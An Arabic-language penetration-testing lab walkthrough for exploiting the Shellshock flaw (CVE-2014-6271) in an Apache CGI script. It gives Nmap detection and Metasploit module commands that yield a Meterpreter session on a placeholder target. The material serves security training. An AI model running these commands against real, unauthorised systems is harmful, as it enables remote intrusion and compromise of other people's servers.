🧪 المختبر 3: استغلال ثغرة Shellshock (CVE-2014-6271)

🎯 الهدف الأساسي: استغلال ثغرة Shellshock (CVE-2014-6271) في Apache Web Server المزود بـ CGI للحصول على تنفيذ الأوامر عن بعد (RCE) أو عكس Shell على نظام Linux.

🔧 الأدوات المستخدمة: Burp Suite (Firefox مع إعدادات البروكسي), netcat, msfconsole, exploit/multi/http/apache_mod_cgi_bash_env_exec.

📜 خطوات التنفيذ:

📊 منهجية اختبار الاختراق: الاستطلاع، الفحص، تقييم الثغرات، الاستغلال

  1. اكتشاف خدمة الويب:

    بعد ما عرفنا انه منفذ 80 شغال نتأكد من وجود خادم الويب .

    • الأمر الأساسي:

      http://192.0.x.0
    • الشرح: انتقل إلى الباج سورس .

    • ابحث عن أي نصوص CGI (مثل get_time.cgi) عن طريق استكشاف الموقع.

  2. تقييم الثغرات (تحديد Shellshock):

    • استخدم سكريبت Nmap http-shellshock للتحقق مما إذا كان الخادم المستهدف عرضة لثغرة Shellshock.

    • الأمر:

      nmap --script http-shellshock --script-args http-shellshock.uri=/cgi-bin/get_time.cgi 192.0.x.0
    • الشرح: إذا نفذت هذا الأمر سيعرض لك Nmap ما إذا كان الهدف معرضاً لثغرة Shellshock (CVE-2014-6271).

  3. الاستغلال باستخدام Metasploit Framework:

    • شغل Metasploit Console.

    • الأمر:

      msfconsole -q
      search shellshock
    • الشرح: إذا نفذت هذه الأوامر بتظهر لك وحدات Metasploit المتعلقة بـ Shellshock.

    • الأمر:

      use exploit/multi/http/apache_mod_cgi_bash_env_exec
      set RHOSTS <Target_IP>
      set TARGETURI /cgi-bin/get_time.cgi
      exploit
    • الشرح: إذا نفذت هذه الأوامر، ستقوم Metasploit باستغلال الثغرة وستحصل على جلسة Meterpreter على الهدف.

Last updated